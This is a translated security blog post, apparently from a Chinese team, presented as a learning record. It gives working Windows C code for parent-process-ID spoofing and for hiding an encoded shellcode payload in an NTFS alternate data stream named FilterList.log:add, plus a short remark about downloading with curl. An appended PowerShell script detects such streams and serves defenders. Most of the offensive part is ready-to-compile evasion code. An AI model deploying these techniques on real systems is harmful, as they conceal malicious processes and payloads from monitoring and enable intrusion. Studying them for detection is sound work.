Article 19 from 泛星安全团队 (Fanxing Security Team)
This article is a learning record. Do not use the techniques described in it for unauthorised testing; the author and this public account bear no responsibility for any adverse consequences that result.
PPID, ADS streams
1. Preface
2. Using PPID spoofing to forge the parent process
Reference code:
https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing
#include <windows.h>
#include <stdio.h>
int main()
{
    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    SIZE_T attributeSize;
    ZeroMemory(&si, sizeof(STARTUPINFOEXA));
    // Handle to the process that will be reported as the parent (PID 6200 is hard-coded in the post)
    HANDLE parentProcessHandle = OpenProcess(MAXIMUM_ALLOWED, FALSE, 6200);
    if (parentProcessHandle == NULL) {
        printf("[!] OpenProcess failed: %lu\n", GetLastError());
        return -1;
    }
    // First call only computes the size needed for the attribute list
    InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);
    // PROC_THREAD_ATTRIBUTE_PARENT_PROCESS makes the new process a child of parentProcessHandle
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);
    si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
    CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);
    // Release the attribute list and the handles we own
    DeleteProcThreadAttributeList(si.lpAttributeList);
    HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    CloseHandle(parentProcessHandle);
    CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
    return 0;
}
Here I chose to invoke the curl that ships with Windows to perform the download:
Compile and run:
3. Using Windows ADS streams to hide shellcode
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// The post calls ReadWholeFile without showing it; this definition is supplied so the code compiles.
// Reads a whole file into a heap buffer and returns the number of bytes read (0 on failure).
static DWORD ReadWholeFile(const char* path, void** out)
{
    FILE* f = fopen(path, "rb");
    if (!f) return 0;
    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    fseek(f, 0, SEEK_SET);
    char* buf = (char*)malloc(size > 0 ? size : 1);
    DWORD n = buf ? (DWORD)fread(buf, 1, size, f) : 0;
    fclose(f);
    *out = buf;
    return n;
}

int main(void)
{
    char* pszRead = NULL;
    char FSName[1024];
    WCHAR* target_stream = L"C:\\Windows\\temp\\FilterList.log:add";   // "<file>:<stream name>"
    char received[1024];
    DWORD bytesOut;
    WIN32_FIND_STREAM_DATA stream_data;
    // encode.txt holds the encoded payload; the post wrote a fixed 2121 bytes, the size of its file
    DWORD payloadLen = ReadWholeFile("encode.txt", (void**)&pszRead);
    if (payloadLen == 0) {
        printf("[!] Could not read encode.txt\n");
        return -1;
    }
    // Alternate data streams only exist on NTFS volumes
    GetVolumeInformationA("C:\\", NULL, 0, NULL, NULL, NULL, FSName, sizeof(FSName));
    if (_stricmp(FSName, "NTFS") == 0) {
        HANDLE tFile = CreateFileW(target_stream,
            GENERIC_READ | GENERIC_WRITE | FILE_WRITE_ATTRIBUTES,
            FILE_SHARE_READ,
            NULL,
            OPEN_ALWAYS,
            FILE_FLAG_SEQUENTIAL_SCAN | FILE_ATTRIBUTE_NORMAL,
            NULL);
        if (tFile == INVALID_HANDLE_VALUE) {
            printf("[!] Could not open file: %ls\r\n", target_stream);
            return -1;
        }
        // Write into the named stream; the main (unnamed) stream of FilterList.log stays empty
        WriteFile(tFile, pszRead, payloadLen, &bytesOut, NULL);
        // Enumerate the streams attached to the file to confirm the ":add" stream exists
        HANDLE hFind = FindFirstStreamW(target_stream, FindStreamInfoStandard, &stream_data, 0);
        if (hFind == INVALID_HANDLE_VALUE) {
            printf("[!] Could not find any streams!\n");
            return -1;
        }
        do {
            wprintf(L"Stream: %ls (%lld bytes)\n", stream_data.cStreamName, stream_data.StreamSize.QuadPart);
        } while (FindNextStreamW(hFind, &stream_data));
        FindClose(hFind);
        // Rewind and read the stream contents back
        SetFilePointer(tFile, 0, NULL, FILE_BEGIN);
        ReadFile(tFile, received, sizeof(received), &bytesOut, NULL);
        CloseHandle(tFile);
    }
    else {
        printf("Not this time, buddy!\n");
    }
    free(pszRead);
    return 0;
}
4. Result
Run the program:
Opening the newly created FilterList.log shows an empty file; our data exists only in the FilterList.log:add stream that was created alongside it.
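As an added defender-side example (not code from the original post), the following PowerShell script scans a directory for files carrying named NTFS streams and flags the pattern just described: an empty main stream next to a named stream that holds data. The scan root C:\Windows\Temp is an assumed default.

```powershell
# Added example, not from the original post: list NTFS alternate data streams under a
# directory and flag named streams that carry data. $ScanRoot is an assumed default.
param([string]$ScanRoot = 'C:\Windows\Temp')

function Find-AlternateStreams {
    param([Parameter(Mandatory)][string]$Path)

    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        # '-Stream *' returns one record per stream; ':$DATA' is the unnamed main stream.
        Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' } |
        ForEach-Object {
            [pscustomobject]@{
                File        = $file.FullName
                Stream      = $_.Stream
                StreamBytes = $_.Length
                MainBytes   = $file.Length
                # Zone.Identifier is written by browsers on download and is usually benign;
                # any other non-empty named stream deserves a look.
                Suspicious  = ($_.Stream -ne 'Zone.Identifier' -and $_.Length -gt 0)
                # An empty main stream beside a populated named stream matches the post's FilterList.log case.
                MainEmpty   = ($file.Length -eq 0)
                LastWrite   = $file.LastWriteTime
            }
        }
    }
}

$findings = Find-AlternateStreams -Path $ScanRoot
if ($findings) {
    $findings | Sort-Object Suspicious, StreamBytes -Descending | Format-Table -AutoSize
} else {
    "No alternate data streams found under $ScanRoot"
}
```

Run it from an elevated prompt if the scan root is under C:\Windows; the same enumeration can be checked manually with `Get-Item <file> -Stream *`.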
References:
https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/untitled-1/parent-pid-spoofing
Originally published on the WeChat public account 泛星安全团队: Bypassing communication monitoring and hiding shellcode on Windows